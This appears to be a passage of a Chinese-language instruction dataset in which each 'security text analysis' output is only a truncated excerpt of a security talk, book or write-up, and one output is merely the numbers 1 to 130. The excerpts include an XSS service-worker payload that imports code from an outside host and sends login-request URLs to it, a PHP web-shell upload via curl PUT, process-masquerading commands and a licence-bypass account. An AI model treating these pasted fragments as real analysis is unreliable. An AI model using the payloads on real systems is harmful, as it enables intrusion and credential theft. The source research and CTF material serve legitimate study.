MAVIC(Wi-Fi) 飞行器 Yes XPLORER 遥控器 Yes 定位与追踪 通过多个WiFi senior进行三角定位判断目标的大致 方位 功能总结  无人机发现与识别  控制/图传干扰  飞行器操控者定位跟踪  黑白名单管理  电子证据 反无人机系统的设计与实现 系统架构 Requiremnts Hardware  Linux host  5G&2.4G Dual Band WiFi module  GPS module Software:  Kismet  Analysis scripts Test UAV:  DJI Phan", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1.1 1.2 1.3 1.4 1.5 1.6 1.7 1.8 1.9 1.10 目錄 Android渗透测试学习手册中文版 第一章Android安全入门 第二章准备实验环境 第三章Android应用的逆向和审计 第四章对Android设备进行流量分析 第五章Android取证 第六章玩转SQLite 第七章不太知名的Android漏洞 第八章ARM利用 第九章编写渗透测试报告 2 Android渗透测试学习手册中文版 原书LearningPentestingforAndroidDevices 译者飞龙 在线阅读 PDF格式 EPUB格式 MOBI格式 代码仓库 赞助我 协议 CCBY-NC-SA4.0 Android渗透测试学习手册中文版 3 第一章Android安全入门 作者AdityaGupta 译者飞龙 协议CCBY-NC-SA4.0 Android是当今最流行的智能手机操作系统之一随着人气的增加它存在很多安全风险 这些风险不可避免地被引入到应用程序中使得用户本身受到威胁我们将在本书中以方法 论和循序渐进的方式来讨论Android应用程序安全性和渗透测试的各个方面 本章的目标是为Android安全打下基础以便在以后的章节中使用 1.1Android简介 自从Android被谷歌收购2005年谷歌已经完成了整个开发在过去的9年里尤其是 在安全方面有很多变化现在它是世界上最广泛使用的智能手机平台特别是由于不同 的手机制造商如LG三星索尼和HTC的支持Android的后续版本中引入了许多新概 念例如GoogleBouncer和GoogleAppVerifier我们将在本章逐一介绍它们 如果我们看看Android的架构如下图所示我们将看到它被分为四个不同的层在它的底 部是Linux内核它已被修改来在移动环境中获得更好的性能Linux内核还必须与所有硬件 组件交互因此也包含大多数硬件驱动程序此外它负责Android中存在的大多数安全功 能由于Android基于Linux平台它还使开发人员易于将Android移植到其他平台和架 构Android还提供了一个硬件抽象层供开发人员在Android平台栈和他们想要移植的硬 件之间创建软件钩子 在Linux内核之上是一个层级包含一些最重要和有用的库如下所示 SurfaceManager管理窗口和屏幕媒体框架这允许使用各种类型的编解码器来播放和记 录不同的媒体SQLite这是一个较轻的SQL版本用于数据库管理WebKit这是浏览器渲 染引擎OpenGL用于在屏幕上正确显示2D和3D内容 以下是来自Android开发人员网站的Android架构的图形表示 第一章Android安全入门 4 Android中的库是用C和C++编写的其中大多数是从Linux移植的与Linux相比 Android中的一个主要区别是在这里没有 libc库它用于Linux中的大多数任务相反 Android有自己的称为 bionic的库我们可以认为它是一个剥离和修改后的用于Android 的libc版本 在同一层级还有来自Android运行时--Dalvik虚拟机和核心库的组件我们将在本书的下 一部分中讨论关于Dalvik虚拟机的很多内容 在这个层之上有应用程序框架层它支持应用程序执行不同类型的任务 此外开发人员创建的大多数应用程序只与第一层和最顶层的应用程序交互该架构以一种 方式设计在每个时间点底层都支持上面的层级 早期版本的Android<4.0基于Linux内核2.6.x而较新版本基于内核3.x.不同的 Android版本和他们使用的Linux内核的列表规定如下 第一章Android安全入门 5 Android中的所有应用程序都在虚拟环境下运行这称为Dalvik虚拟机DVM这里需要 注意的一点是从Android4.4版本开始还有另一个运行时称为Android运行时ART 用户可以在DVM和ART运行时环境之间自由切换 然而对于这本书我们将只关注Dalvik虚拟机实现它类似于Java虚拟机JVM除 了基于寄存器的特性而不是基于堆栈的特性因此运行的每个应用程序都将在自己的 Dalvik虚拟机实例下运行因此如果我们运行三个不同的应用程序将有三个不同的虚拟 实例现在这里的重点是即使它为应用程序创建一个虚拟环境来运行它不应该与安全 容器或安全环境混淆DVM的主要焦点是与性能相关而不是与安全性相关 Dalvik虚拟机执行一个名为 .dex或Dalvik可执行文件的文件格式我们将进一步查 看 .dex文件格式并将在下面的章节中进行分析现在让我们继续与adb进行交互并更 深入地分析Android设备及其体系结构 1.2深入了解Android 如果你有Android设备或正在运行Android模拟器则可以使用AndroidSDK本身提", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nManyonymity: Its Who You Dont Know GM  To Think About  PHP Distributed Encryption  What is an acceptable level of mass- market encryption?  How does the average joe fingerprint and protect their daily communication?  What are the true benefits of open- source vs. major company-owned encryption services?  What percentage of your daily digital communication is sent unencrypted?  How do we accelerate the adoption of PHP at the server level? Manyonymity: In The Beginning  What Were Going To Talk About  Questions & answers  General discussion of encryption methods, theories and apps  Introduction to Manyonymity  In-depth: Installing Manyonymity  Demo: configuring Manyonymity, bringing it to GO  In-depth: Maintaining Manyonymity (Admin)  Demo: administering Manyonymity, reports, alerts & tools  In depth: Using Manyonymity (Member)  Demo: sign-up, text encryption, fingerprinting  Conclusion: Review  Conclusion: Future Manyonymity: By Adam Bresson  Who I Am  10+ years in computers with expertise in all PC OSs, Linux, PHP and Security  DEFCON 08/2000: Palm Security Talk  DEFCON 09/2001: PHP, Data Mining & Web Security Talk  DEFCON 10/2002: Consumer Media Protections (CMP) Talk  Started Recommendo.com, a web community devoted to What Youll Like connections between Movies, TV, Books and Music, human-based reviews  Started GetAnyGame.com, a web community that rents video games for the major consoles by mail and recycles your old games by helping you make money renting them on consignment Manyonymity: You Want Answers?  What is an acceptable level of mass-market encryption?  128-bit SSL is standard in the browser and OS, we need fingerprinting, encryption and steganography  How does the average joe fingerprint and protect their daily communication?  Use M from multiple points of access for max reliability  What are the true benefits of open-source vs. major company- owned encryption services?  Open-source is expandable, solid, reliable, free-of-influence (political, etc.)  What ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n西湖论剑 WP-Nu1L WEB HardXSS 网站就 dns 爆破 + 提交 xss + 管理员登录三个功能, 用了两个域名`xss.xss.` , `auth.xss.` 题目有句话 `我收到邮件后会先点开链接然后登录我的网站` , 这么一看这个题应该是需要作 一个 xss 持久化的. xss 持久化就两种方式 serviceworker, 和 cache. cache 在这个题目里面没 法控制, 所以就得 serviceworker. 要用 serviceworker 就得找一个能 xss 的点, 去注册这个 serviceworker. 这里我们看代码发现一个 jsonp, 而且没有过滤, 于是就用这个路由做 xss, 代码就不分析了, 反正就是调用 jsonp 没过滤, 后面也要用到. https://xss.xss.eec5b2.challenge.gcsis.cn/login?callback=eval(atob(lala))//&lala=YWxlc nQoMSk%3d 因为登录用到的用户名密码是传输到了 auth.xss.这个域名, 如果要注册 serviceworker, 需要 serviceworker 的 js 在 auth.xss.这个域名下, 也就是需要这个域名下的一个可控的点去放 serviceworker 的 js. 也就是我们上面发现的 jsonp 的这个点 https://auth.xss.eec5b2.challenge.gcsis.cn/api/loginStatus?callback=50chars 这里有 50 个字符的限制, 但是我们可以把真实的 payload 放到我们服务器上, 让 serviceworker 去 import 第一个 js navigator.serviceWorker.register(\"https://auth.xss.eec5b2.challenge.gcsis.cn/api/loginS tatus?callback=importScripts('//d7cb7b72.y7z.xyz/xhlj2.js');//\") 第二个 js self.addEventListener('fetch', function (event) { var url = event.request.clone(); body = '<script>fetch(\"https://d7cb7b72.y7z.xyz/?'+btoa(url.url)+'\").then(function (resp){console.log(resp)})</script>'; init = {headers: { 'Content-Type': 'text/html' }}; if(url.url.startsWith('https://auth.xss.eec5b2.challenge.gcsis.cn/api/loginVerify')){ res = new Response(body,init); event.respondWith(res.clone()); } }); 最后一个问题就是 serviceworker 在注册的时候必须是同源的页面才能注册上 访问 auth.xss.这个域名, 可以看到在主页上有一个 document.domain=\"xss.\"的一个操作. 那么就可以联想到跨域的操作里面有一个就是利用 document.domain 和 iframe 去做的. 那 么我们就可以利用之前找到的 xss 去实现这个操作. https://xss.xss.eec5b2.challenge.gcsis.cn/login?callback=eval(atob(lala))//&lala=ZG9jd W1lbnQuZG9tYWluID0gInhzcy5lZWM1YjIuY2hhbGxlbmdlLmdjc2lzLmNuIjsKaWZyYW 1lID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiaWZyYW1lIik7CmlmcmFtZS5zcmM9Im h0dHBzOi8vYXV0aC54c3MuZWVjNWIyLmNoYWxsZW5nZS5nY3Npcy5jbiI7CiQoJ2JvZ HknKS5hcHBlbmQoaWZyYW1lKTsKaWZyYW1lLm9ubG9hZCA9IGZ1bmN0aW9uKCkge wogICAgZG9jID0gaWZyYW1lLmNvbnRlbnREb2N1bWVudDsKICAgIHNjciA9IGRvYy5jc mVhdGVFbGVtZW50KCJzY3JpcHQiKTsKICAgIHNjci5zcmM9Imh0dHBzOi8v", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1036-003-win-重命名程序名称 ## 来自ATT&CK的描述 攻击者可能会重命名合法的系统实用程序以试图规避有关这些实用程序使用的安全机制安全监视和控制机制可能适用于攻击者能够滥用的系统实用程序可以通过在使用之前重命名实用程序来绕过这些安全机制例如 rename `rundll32.exe`当合法实用程序被复制或移动到不同的目录并重命名以避免基于从非标准路径执行的系统实用程序的检测 ## 测试案例 Masquerading是为了逃避蓝队的查找,而进行的伪装.其中的一种方法是可执行文件放在一个通常受信任的目录中或者给它一个合法的名字.或者文件名是一个和受信任文件相似的文件名.其中一个情况就是当common system utility被移动和修改名字,来避免被检测.这可以绕过基于文件名的检测,以及蓝队的眼睛 还有一种是right-to-left覆盖(RTLO or RLO) ,它可以让文件名反过来,迷惑蓝队成员 红队还可以修改二进制文件的图标,产品描述等来迷惑蓝队成员 对于windows还有一种技术:对合法的工具集进行重命名,例如rundll32.exe,一个案例就是当合法的工具集移动到不同的目录中并且重命名来避免检查.其中一个滥用的受信任地址为`C:\\Windows\\System32`,有害的程序可以伪装成`\"explorer.exe\"和\"svchost.exe\"`来绕过检查. 对于linux系统,有一种技术就是在程序运行之后,修改它的名称和路径,防止检测,一个被滥用的地址就是`/bin`名称可以改为rsyncd和dbus-inotifier ## 检测日志 Windows安全日志/Sysmon日志 ## 测试复现 ### 测试1 MASQUERADING AS WINDOWS LSASS PROCESS 复制cmd.exe并重命名,把它伪装成了lsass.exe ``` cmd.exe /c copy %SystemRoot%\\System32\\cmd.exe %SystemRoot%\\Temp\\lsass.exe cmd.exe /c %SystemRoot%\\Temp\\lsass.exe ``` 清除 ``` del /Q /F %SystemRoot%\\Temp\\lsass.exe ``` win10成功复现 ### 测试2 MASQUERADING AS LINUX CROND PROCESS. 复制sh,重命名crond,然后运行它达到伪装的目的 ``` cp /bin/sh /tmp/crond /tmp/crond ``` 成功复现 ### 测试3 MASQUERADING - CSCRIPT.EXE RUNNING AS NOTEPAD.EXE 把cscript.exe伪装成notepad.exe ``` copy %SystemRoot%\\System32\\cscript.exe %APPDATA%\\notepad.exe /Y cmd.exe /c %APPDATA%\\notepad.exe /B ``` 清除 ``` del /Q /F %APPDATA%\\notepad.exe ``` win10成功复现 ### 测试4 MASQUERADING - WSCRIPT.EXE RUNNING AS SVCHOST.EXE ``` copy %SystemRoot%\\System32\\wscript.exe %APPDATA%\\svchost.exe /Y cmd.exe /c %APPDATA%\\svchost.exe /B ``` win10成功复现 ### 测试5 MASQUERADING - POWERSHELL.EXE RUNNING AS TASKHOSTW.EXE ``` copy %windir%\\System32\\windowspowershell\\v1.0\\powershell.exe %APPDATA%\\taskhostw.exe /Y cmd.exe /K %APPDATA%\\taskhostw.exe ``` win10成功复现 ### 测试6 MASQUERADING - NON-WINDOWS EXE RUNNING AS WINDOWS EXE ``` copy #{inputfile} #{outputfile} $myT1036 = (Start-Process -PassThru -FilePath #{outputfile}).Id Stop-Process -ID $myT1036 ``` win10成功复现 ### 测试7 MASQUERADING - WINDOWS EXE RUNNING AS DIFFERENT WINDOWS EXE ``", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHacking With GnuRadio Hacking With GnuRadio How to have fun with wireless transmissions! David M. N. Bryan David M. N. Bryan Info Security Consultant Info Security Consultant CISSP CISSP HAM HAM Hacker Hacker DEFCON DEFCON Hacker Spaces!!! Hacker Spaces!!! Thanks to CCCKC  Sweet Hacker Space! Thanks to CCCKC  Sweet Hacker Space! What is this? What is this? Is that a hot pack in your pocket? Is that a hot pack in your pocket? Physical Attack Physical Attack Physical Attack Physical Attack Physical Attack Physical Attack Counter Measures ? Counter Measures ? Mind the gap! Mind the gap! Disable the use of RTE Disable the use of RTE Crash bar Crash bar Push to exit Push to exit Hacking With GnuRadio Hacking With GnuRadio What is GnuRadio? What is GnuRadio? What you need What you need Requirements Requirements Costs Costs What is GnuRadio? What is GnuRadio? Software  Python = byte code = good! Software  Python = byte code = good! Hardware - Hardware - Universal Software Radio Peripheral Universal Software Radio Peripheral Field Programmable Gate Array Field Programmable Gate Array 4 DAC 4 DAC 4 ADC 4 ADC TX / RX Daughter boards from 0.1Mhz to 5.8Ghz TX / RX Daughter boards from 0.1Mhz to 5.8Ghz USRP v1.0 USRP v1.0 USRP Board USRP Board Daughter Boards Daughter Boards How Can I use it? How Can I use it? Get Hardware  USRP Get Hardware  USRP Install Ubuntu  or other Unix like OS Install Ubuntu  or other Unix like OS USRP Interface Requirements USRP Interface Requirements v1.0 USB 2.0 v1.0 USB 2.0 v2.0 Gigabit Ethernet v2.0 Gigabit Ethernet Why should I use it? Why should I use it? Wireless Signal Receiving and Generation Wireless Signal Receiving and Generation Circuit logic Circuit logic Oscillator Oscillator Other methods are painfully slow for prototyping Other methods are painfully slow for prototyping Cost Cost USRP1 $700 USRP1 $700 USRP2 $1400 USRP2 $1400 Daughter Boards $75-$400 Daughter Boards $75-$400 Screws/Case $20 Screws/Case $20 Not specifically FCC Part Licen", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# SickOs 1.2 下载地址https://download.vulnhub.com/sickos/sick0s1.2.zip ## 实战操作 扫描靶场IP地址`192.168.32.148` ![image-20220531102836395](../../.gitbook/assets/image-20220531102836395.png) 扫描端口发现只开启**22**和**80**端口 ``` (rootkali)-[/tmp] # nmap -sT -p1-65535 192.168.32.148 Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-30 22:30 EDT Nmap scan report for 192.168.32.148 Host is up (0.00067s latency). Not shown: 65533 filtered tcp ports (no-response) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http MAC Address: 00:0C:29:3D:60:3D (VMware) Nmap done: 1 IP address (1 host up) scanned in 104.58 seconds ``` 浏览器访问80端口 ![image-20220531103338753](../../.gitbook/assets/image-20220531103338753.png) 使用目录扫描器只扫描到**test**目录 ![image-20220531103856954](../../.gitbook/assets/image-20220531103856954.png) 通过 curl 检查可用方法时PUT 方法可用这可用于上传反向 shell ``` (rootkali)-[/tmp] # curl -v -X OPTIONS http://192.168.32.148/test/ * Trying 192.168.32.148:80... * Connected to 192.168.32.148 (192.168.32.148) port 80 (#0) > OPTIONS /test/ HTTP/1.1 > Host: 192.168.32.148 > User-Agent: curl/7.81.0 > Accept: */* > * Mark bundle as not supporting multiuse < HTTP/1.1 200 OK < DAV: 1,2 < MS-Author-Via: DAV < Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK < Allow: OPTIONS, GET, HEAD, POST < Content-Length: 0 < Date: Tue, 31 May 2022 10:40:36 GMT < Server: lighttpd/1.4.28 < * Connection #0 to host 192.168.32.148 left intact ``` 通过 PUT 请求利用文件上传使用 curl 上传包含以下代码的 PHP 文件这将允许我们远程执行代码 ``` (rootkali)-[/tmp] # curl -v -X PUT -d '<?php echo system($_REQUEST['cmd']);?>' http://192.168.32.148/test/shell.php * Trying 192.168.32.148:80... * Connected to 192.168.32.148 (192.168.32.148) port 80 (#0) > PUT /test/shell.php HTTP/1.1 > Host: 192.168.32.148 > User-Agent: curl/7.81.0 > Accept: */* > Content-Length: 36 > Content-Type: application/x-www-form-urlencoded > * Mark bundle as not supporting multiuse < HTTP/1.1 201 Created < Content-Length: 0 < Date: Tue, 31 May 2022 10:41:40 GMT < Server: lighttpd/1.4.28 < * ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHacking and protecting Oracle Database Vault Esteban Martínez Fayó Argeniss (www.argeniss.com) July 2010 Agenda  Introduction to Oracle Database Vault  What is Oracle Database Vault, What changes introduce, Oracle Database Vault elements.  Attacks against Database Vault  Getting OS access  Impersonating MACSYS user  Special considerations for the SYS user o SQL Injection in SYS schema  Oracle Database Auditing and SYS user  Additional protection measures  Conclusions What is Oracle Database Vault?  Its an add-on to Oracle Database.  Supported Oracle Database Releases: 9i R2, 10g R2, 11g R1 and 11g R2.  Oracle Database Vault can prevent highly privileged users, including powerful application DBAs and others, from accessing sensitive applications and data in Oracle databases outside their authorized responsibilities  The DBA no longer has unlimited access to database data.  Helps protect against the insider threat and address regulatory compliance needs such as Sarbanes-Oxley (SOX) and PCI .  The main goal of Oracle Database Vault is to provide Separation of Duty What changes with Database Vault?  Some initialization parameteres are changed to more secure values.  RECYCLE BIN feature is disabled  Revokes some privileges from default roles  DBA, IMP_FULL_DATABASE, EXECUTE_CATALOG_ROLE, SCHEDULER_ADMIN and PUBLIC.  Database audit is configured to include more actions, but auditing is not enabled.  Must issue ALTER SYSTEM SET AUDIT_TRAIL  SYS.AUD$ Table Moved to SYSTEM Schema. What changes with Database Vault?  SYS, SYSTEM and other schemas are protected as well as sensitive commands like ALTER USER.  Installing patches require to disable DBVault.  DBVault can be disabled with OS access.  On Windows: Under %ORACLE_HOME%\\bin, delete or rename oradv[release_number].dll (example: oradv10.dll, oradv11.dll) file.  On Linux: make -f $ORACLE_HOME/rdbms/lib/ins_rdbms.mk dv_off $ORACLE_HOME/bin/relink oracle What changes with Database Vault?  In older releases:  OS authentication", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 浅谈Goby Redteam版本破解 前 基础信息收集 尝试破解 从官获取Goby Redteam版本 作者:天河 Goby是款新的络安全测试具由赵武ZwellPangolinJSkyFOFA作者打造它能够 针对个标企业梳理最全的攻击信息同时能进效实战化漏洞扫描并快速地从个 验证点切换到横向我们希望能够输出更具命的具能够对标客的实际能帮 助企业来有效地理解和应对络攻击 前天在络上冲浪偶然得知goby还有Redteam版本发现络上并没有Redteam版本的破解版 也没有相关的破解章因此我对goby的验证体系产了好奇考虑到开发者利益这不展示具体破解 代码 先从朋友那要了个redteam版本的goby打开运之后查看其进程发现其存在四个进程如下图 所示 其中三个是由goby.exe启动的,另个是goby-cmd.exe启动 前 基础信息收集 2 从这致了解出了goby的基础架构 猜测goby-cmd于提供扫描器的些核功能goby.exe于提供户交互的界使的是 electron开发代码在app.asar中 打开程序在左下可以申请或者设置license 其中有个较重要的信息是MID 这串值是通过对本地信息计算得到的串数值 打开wireshark捕获本地流量发现存在向8361端访问的流量 对http://127.0.0.1:8361/api/v1/version,以及http://127.0.0.1:8361/api/v1/getEnvi? field=licenseInfo进访问获取licenseInfo等相关信息() 这我本地写了个http服务尝试顶掉8361端代替他进回复果然成功通过了验证机制在验证过 后重启goby-cmd.exe提供服务此我的goby换上了Redteam版本的红肤 尝试破解 Plain Text 复制代码 PID=22396 名称=goby-cmd 命令参数=-mode api -bind 127.0.0.1:8361 -rate 100 -random true PID=25632 名称=Goby 命令参数=--type=renderer --no-sandbox --enable-features=FixAltGraph -- service-pipe-token=XXXXX --lang=zh-CN --app-path=\"D:\\goby-win-x64- 1.8.281\\resources\\app.asar\" --node-integration=true --webview-tag=true PID=4640 名称=Goby 标题=Chrome_WidgetWin_0 命令参数=--type=gpu-process --enable-features=FixAltGraph --no-sandbox -- gpu-preferences=XXXXXXXX PID=8648 名称=Goby 标题=Goby - Attack surface mapping 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 3 众所周知redteam版本最的不同是多出了很多的poc通过点击右下漏洞升级即可获得 但我破解后发现法获取到这些专业版本的poc这是为什么呢 通过对app.asar解包后阅读源码 Plain Text 复制代码 解包法如下 npm install asar -g asar e app.asar 件夹 1 2 3 4 4 发现程序是通过从远程从官的服务器来下载获取poc的其中有个参数的值为成的MID值怪不得 法下载下来原来是因为我计算机成的MID值不能通过远程服务器校验如何通过远端服务器校验 呢要么找官的帮你把你的mid加进去要么把服务器打下来身为守法公我当然是选择了 1(其实是因为进制菜鸡根本不会渗透) 添加了Gobybot的微信经过询问得知可以写插件来获得就顺写了个插件获得了个的 Redteam版本使机会美滋滋 后使样的请求和参数再次尝试下载poc果然成功了(下载的poc是被加密过的)验证了我的猜想 服务端是存在校验的 突然反应过来我要redteam版本有啥我不专搞渗透 从官获取Goby Redteam版本", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTotal Endpoint Protection: #1 in EDR & Next-Gen AV No Win32_Process Needed Expanding The WMI Lateral Movement Arsenal Total Endpoint Protection: #1 in EDR & Next-Gen AV About Me o Security researcher  Cybereason o @PhilipTsukerman o Probably really stressed out right now Total Endpoint Protection: #1 in EDR & Next-Gen AV Outline o Lateral movement and WMI o New and improved methods o A word about detection Total Endpoint Protection: #1 in EDR & Next-Gen AV Lateral Movement Lateral Movement Total Endpoint Protection: #1 in EDR & Next-Gen AV Lateral Movement Initial Foothold Credentials Target Machine Phishing/ Exploit/etc Total Endpoint Protection: #1 in EDR & Next-Gen AV Lateral Movement oAbuses features, not bugs oFeatures mostly work as intended Total Endpoint Protection: #1 in EDR & Next-Gen AV Common LM Methods o Remote service creation / PSExec o Remote task scheduling o WMI Win32_Process.Create Total Endpoint Protection: #1 in EDR & Next-Gen AV A Bit About WMI o A Windows feature providing object-oriented representation of applications, devices etc. o Available remotely (through DCOM and WinRM) Total Endpoint Protection: #1 in EDR & Next-Gen AV A Bit About WMI Mainly variations of SELECT * FROM Win32_Process Total Endpoint Protection: #1 in EDR & Next-Gen AV Some Example Classes Total Endpoint Protection: #1 in EDR & Next-Gen AV WMI, WHAT IS IT MADE OF? Total Endpoint Protection: #1 in EDR & Next-Gen AV WMI, What is it made of? o Winmgmt service o Providers o Repository Total Endpoint Protection: #1 in EDR & Next-Gen AV The WINMGMT Service o A mediator between the WMI model and client applications Total Endpoint Protection: #1 in EDR & Next-Gen AV WMI Providers o Contain the implementations of WMI classes, instances and methods o Most commonly implemented as COM DLLs Total Endpoint Protection: #1 in EDR & Next-Gen AV The WMI repository o The central storage area for the WMI model o Contains definitions and instances Total Endpoint Protection: #1 in EDR & Next-", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--- title: YAML date: 2020-12-29 18:26:55 background: bg-[#b42e28] tags: - config - format categories: - Programming intro: | This is a quick reference cheat sheet for understanding and writing YAML format configuration files. plugins: - copyCode --- Getting Started --------------- ### Introduction [YAML](https://yaml.org/) is a data serialisation language designed to be directly writable and readable by humans - YAML does not allow the use of tabs - Must be space between the element parts - YAML is CASE sensitive - End your YAML file with the `.yaml` or `.yml` extension - YAML is a superset of JSON - Ansible playbooks are YAML files {.marker-round} ### Scalar types {.row-span-2} ```yaml n1: 1 # integer n2: 1.234 # float s1: 'abc' # string s2: \"abc\" # string s3: abc # string b: false # boolean type d: 2015-04-05 # date type ``` ####  Equivalent JSON ```json {.wrap} { \"n1\": 1, \"n2\": 1.234, \"s1\": \"abc\", \"s2\": \"abc\", \"s3\": \"abc\", \"b\": false, \"d\": \"2015-04-05\" } ``` Use spaces to indent. There must be space between the element parts. ### Variables ```yaml some_thing: &VAR_NAME foobar other_thing: *VAR_NAME ``` ####  Equivalent JSON ```json {.wrap} { \"some_thing\": \"foobar\", \"other_thing\": \"foobar\" } ``` ### Comments ```yaml # A single line comment example # block level comment example # comment line 1 # comment line 2 # comment line 3 ``` ### Multiline strings ```yaml description: | hello world ``` ####  Equivalent JSON ```json {.wrap} {\"description\": \"hello\\nworld\\n\"} ``` ### Inheritance {.row-span-2} ```yaml parent: &defaults a: 2 b: 3 child: <<: *defaults b: 4 ``` ####  Equivalent JSON ```json {.wrap} { \"parent\": { \"a\": 2, \"b\": 3 }, \"child\": { \"a\": 2, \"b\": 4 } } ``` ### Reference {.row-span-2} ```yaml values: &ref - Will be - reused below other_values: i_am_ref: *ref ``` ####  Equivalent JSON ```json {.wrap} { \"values\": [ \"Will be\", \"reused below\" ], \"other_values\": { \"i_am_ref\": [ \"Will be\", \"reused below\" ] } } ``` ### Folded strings ```yaml description: > hello wor", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe Legacy Print Spooler: A story about vulnerabilities from the previous millennium until today Peleg Hadar, Senior Security Researcher, SafeBreach Labs Tomer Bar, Research Team Leader, SafeBreach Labs Created: January 2020 Updated: July 2020 (See the Updated Notes section) Table of Contents Introduction 2 Exploring the Print Spooler 2 The Printing Process 3 Diving into the Spooler 4 Our Research Environment 4 Picking our First Target: The SHD File 5 1st Vulnerability - Fuzzing in the Shadow (Files) 6 Sanity Test 6 Patching the Spooler for Fuzzing and Profit 7 Starting to Fuzz 9 First Crash Dump 10 Windows 10 19H2 10 Windows 2000 10 Root Cause Analysis (1st Vulnerability) 11 Background 11 Analyzing the Vulnerability 14 2nd Vulnerability - User-to-SYSTEM Privilege Escalation 15 Introduction 15 Printing to System32 - First Try 16 The RPC Impersonation Barrier 17 Printing to System32 - Second Try 18 Writing Files as SYSTEM 19 Mitigation 20 Updated Notes 21 References 21 Introduction SafeBreach Labs discovered three vulnerabilities in the Windows Print Spooler service. This is the story of how we discovered the DoS, CVE-2020-1048 and CVE-2020-1337 vulnerabilities which we reported to Microsoft. In this blog post, we will demonstrate our journey since we found the vulnerabilities, starting with exploring the Print Spooler components, diving in to the undocumented SHD file format and its parsing process, and last but not least, we will present both of the vulnerabilities which we found in the Print Spooler mechanism and analyze the root cause. Exploring the Print Spooler The Print Spooler is the primary component of the printing interface in Windows OS. Its an executable file that manages the printing process. Some of its responsibilities are:  Retrieving and loading the printer driver  Spooling high-level function calls into a print job  Scheduling the print job for printing The Printing Process The Print Spooler is based on an RPC client/server model, which means that ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n05 Nov 19 Breaching the perimeter - PhantomJs Arbitrary file read Introduction PhantomJS is a headless browser used for automating web page interaction. PhantomJS provides a JavaScript API enabling automated navigation, screenshots, user behavior and assertions making it a common tool used to run browser-based unit tests in a headless system like a continuous integration environment. PhantomJS uses a particular variant of WebKit, normally called QtWebKit, that utilizes Qt (qt.io (https://web.archive.org/web/20191220171022/http://qt.io/)), an open-source multi-platform C++ framework. Using QtWebkit it provides a similar browsing environment to other modern browsers and offers fast and native support for various web standards. Vulnerability summary PhantomJS uses internal module: webpage , to open, close, render, and perform multiple actions on webpages, which suffers from an arbitrary file read vulnerability. The vulnerability exists in the page.open() function of the webpage module, which loads the specified URL and calls a given callback. When opening a HTML file, an attacker can supply specially crafted file content, which allows reading arbitrary files on the filesystem. The vulnerability is demonstrated by using page.render() as the function callback, resulting in the generation of a PDF or an image of the targeted file. var webPage = require('webpage'); var page = webPage.create(); This above JavaScript code initialises and creates a page object that can be used to perform further actions such as loading a webpage. In the code snippet below the page.open() function is responsible for opening and parsing the supplied URL and generating a PNG image using the page.render() function. Tracing the open call in the following example: var page = require('webpage').create(); page.open('http://www.google.com', function() { <-----  setTimeout(function() { page.render('google.png'); phantom.exit(); }, 200); }); Before interacting with a webpage, a PhantomJS instance is lau", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHow I Hacked facebook Again! by Orange Tsai Orange Tsai  Principal security researcher at DEVCORE  Captain of HITCON CTF team  0day researcher, focusing on Web/Application security orange_8361 Infiltrating Corporate Intranet Like NSA Pre-auth RCE on Leading SSL VPNs Orange Tsai (@orange_8361) Meh Chang (@mehqq_) USA 2019 Disclaimer 所有漏洞皆經過 合法流程 回報並且 修復完成 MDM(Mobile Device Management) https://www.manageengine.com/products/desktop-central/images/MDM_features.png 常見 MDM 解決方案 VMWare AirWatch MobileIron Microsoft Intune Trend Micro Mobile Security IBM MaaS 360 Jamf Pro Citrix XenMobi Apple DEP/Profile Manager Sophos Mobile Control ManageEngine 常見 MDM 解決方案 VMWare AirWatch MobileIron Microsoft Intune Trend Micro Mobile Security IBM MaaS 360 Jamf Pro Citrix XenMobi Apple DEP/Profile Manager Sophos Mobile Control ManageEngine Why MobileIron? 1. 根據官網至少 20,000+ 企業使選擇 2. 至少 15% 的財富世界 500 大公司選擇且暴露在外網 3. 台灣企業使用比例最高的 MDM 4. Facebook 有在使用! 如何開始? 怎麼跑起來? 痛苦 架構 Tomcat MI Server 443/8443 Apache 9997 MI Protocol Reverse Proxy TLS Proxy 找洞! 1. 該防的都有防 2. 沒有很好打 3. 